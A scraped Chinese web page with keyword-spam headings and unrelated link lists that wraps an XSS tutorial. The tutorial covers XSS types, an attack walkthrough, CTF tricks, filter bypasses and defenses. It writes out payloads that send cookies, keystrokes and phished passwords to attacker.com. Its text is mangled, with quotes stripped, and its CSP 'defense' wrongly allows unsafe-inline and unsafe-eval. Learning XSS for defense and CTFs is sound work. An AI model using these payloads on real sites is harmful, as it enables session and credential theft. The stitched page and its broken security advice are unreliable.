当前位置: 首页 > news >正文

廊坊网站seo排名计算机开发工具有哪些

廊坊网站seo排名,计算机开发工具有哪些,乔智云智能建站,免费自建网站步骤文章目录 一、什么是XSS#xff1f;二、XSS分类与场景三、XSS攻击实战流程四、CTF中的XSS利用五、XSS防御方案六、绕过过滤的常见技巧七、实战练习资源 一、什么是XSS#xff1f; XSS#xff08;Cross-Site Scripting#xff09; 是一种通过向网页注入恶意脚本#xff08… 文章目录 一、什么是XSS二、XSS分类与场景三、XSS攻击实战流程四、CTF中的XSS利用五、XSS防御方案六、绕过过滤的常见技巧七、实战练习资源 一、什么是XSS XSSCross-Site Scripting 是一种通过向网页注入恶意脚本JavaScript、HTML等在用户浏览器中执行的攻击方式。攻击者可窃取用户Cookie、会话令牌甚至控制用户浏览器行为。 二、XSS分类与场景 存储型XSSStored XSS 特点恶意脚本永久存储在目标服务器如评论区、用户资料页。影响范围所有访问受影响页面的用户。示例scriptalert(XSS);/script // 提交到评论区所有用户加载时触发弹窗反射型XSSReflected XSS 特点恶意脚本通过URL参数传递服务端返回时直接嵌入页面。触发条件用户需点击构造的恶意链接。示例 http://victim.com/search?qscriptalert(document.cookie)/scriptDOM型XSSDOM-Based XSS 特点漏洞位于客户端JavaScript代码中不经过服务端处理。 常见场景通过location.hash、document.write等动态修改DOM。 示例 // 假设页面JS代码document.write(location.hash.substring(1)); 恶意URLhttp://victim.com#img srcx onerroralert(1)三、XSS攻击实战流程 目标场景某博客平台的评论功能存在存储型XSS漏洞。 步骤1探测注入点 在评论区提交测试Payload scriptalert(1)/script若页面弹窗确认漏洞存在。 步骤2窃取用户Cookie 构造Payload将Cookie发送至攻击者服务器 script fetch(http://attacker.com/steal?cookie document.cookie); /script攻击者服务器attacker.com记录窃取的Cookie用于会话劫持。 步骤3钓鱼攻击 伪造登录表单诱导用户输入密码 div styledisplay:none idphish form actionhttp://attacker.com/log methodPOST input typepassword namepassword input typesubmit valueLogin /form /div scriptdocument.getElementById(phish).style.displayblock;/script步骤4键盘记录 监听用户输入并回传数据 scriptdocument.addEventListener(keypress, (e) { fetch(http://attacker.com/keylog?key e.key); }); /script四、CTF中的XSS利用 窃取管理员Cookie获取Flag 题目场景留言板存在XSS管理员会查看留言。 Payload scriptlocation.href http://attacker.com/?flag document.cookie; /script攻击者服务器接收管理员Cookie中的Flag。 DOM型XSS绕过过滤 题目过滤了script标签但允许img标签 img srcx onerroralert(1)利用事件处理器如onerror、onload执行代码。 利用伪协议 通过javascript:协议触发XSS http://victim.com/profile?namea hrefjavascript:alert(1)Click/a五、XSS防御方案 输入过滤与输出编码 对用户输入的特殊字符, , , , 进行HTML实体编码 // PHP示例 echo htmlspecialchars($user_input, ENT_QUOTES, UTF-8);避免直接使用innerHTML优先使用textContent。 内容安全策略CSP 通过HTTP头限制脚本来源 Content-Security-Policy: default-src self; script-src unsafe-inline unsafe-eval设置HttpOnly标志 Cookie中标记HttpOnly防止JavaScript读取 Set-Cookie: sessionabc123; HttpOnly; Secure框架自动防护 使用现代前端框架如React、Vue默认对动态内容进行转义。 六、绕过过滤的常见技巧 大小写混淆 ScRiPtalert(1)/sCriPt编码绕过 HTML实体编码 img srcx onerror#x61;#x6c;#x65;#x72;#x74;#x28;#x31;#x29;JavaScript Unicode编码 \u0061\u006c\u0065\u0072\u0074(1)利用标签属性 svg/onloadalert(1) iframe srcjavascript:alert(1)七、实战练习资源 PortSwigger XSS Labs 地址https://portswigger.net/web-security/cross-site-scripting XSS挑战游戏 XSS GameGooglehttps://xss-game.appspot.com CTF平台 Hack The Box, CTFlearn中的Web题目。 总结XSS攻击的核心在于控制用户浏览器执行恶意脚本。防御需结合输入过滤、输出编码、CSP等多层措施。在CTF中灵活构造Payload并理解上下文过滤规则是解题关键。
http://www.dnsts.com.cn/news/95812.html

相关文章:

  • 常州知名做网站服务类似建E网模型网站建设
  • 涉县住房与城乡建设厅网站校园引流推广方法
  • 个人网站用凡科建站好吗如何使用seo进行综合查询
  • 微信商城网站怎么开发wordpress调用当前分类名称
  • 江门网站建设推广策划企业做网站的步骤与做网站注意事项
  • 好网站分享网站建设如何给网址设置链接
  • 网站怎么开发设计ps模板素材网站
  • 基础型网站价格中文网站建设工具
  • 网站建设择wordpress主题 企业
  • 作网站公司公众号和网站先做哪个比较好
  • 网站可以用cdr做吗移动端社区 wordpress
  • 婚纱网站设计北京市公司网站制作
  • 包头网站建设推广公众号链接制作
  • 网站开发会用到的框架网络运营怎么做
  • 大连制作网站公司柳州做网站去哪家公司好
  • 网站开发课程教学目标北京建设教育协会的网站
  • wordpress 反应慢春秋网络优化技术团队介绍
  • 山东省住房建设厅网站首页html网站地图怎么做
  • 推荐 官网 潍坊网站建设wordpress主题制作下载
  • 做营销型网站用什么技术张家港保税区建设局网站
  • 东莞做企业网站wordpress 打断点
  • 淘宝上的网站建设3d培训班一般学费多少
  • 网站建设饱和了吗去除wordpress谷歌字体
  • 广州网站建设开发郑州网站制作方案
  • 网站建设 博采网络 学校无锡找做网站
  • 做微网站多少钱百度手机网站优化指南
  • 搭建自己的博客网站在线考试响应式网站模板下载
  • 广西麒铭建设有限公司网站今天长沙做
  • 网站备案作用备案时网站建设方案书
  • 昆明专业网站排名推广我要进入手机建设银行网站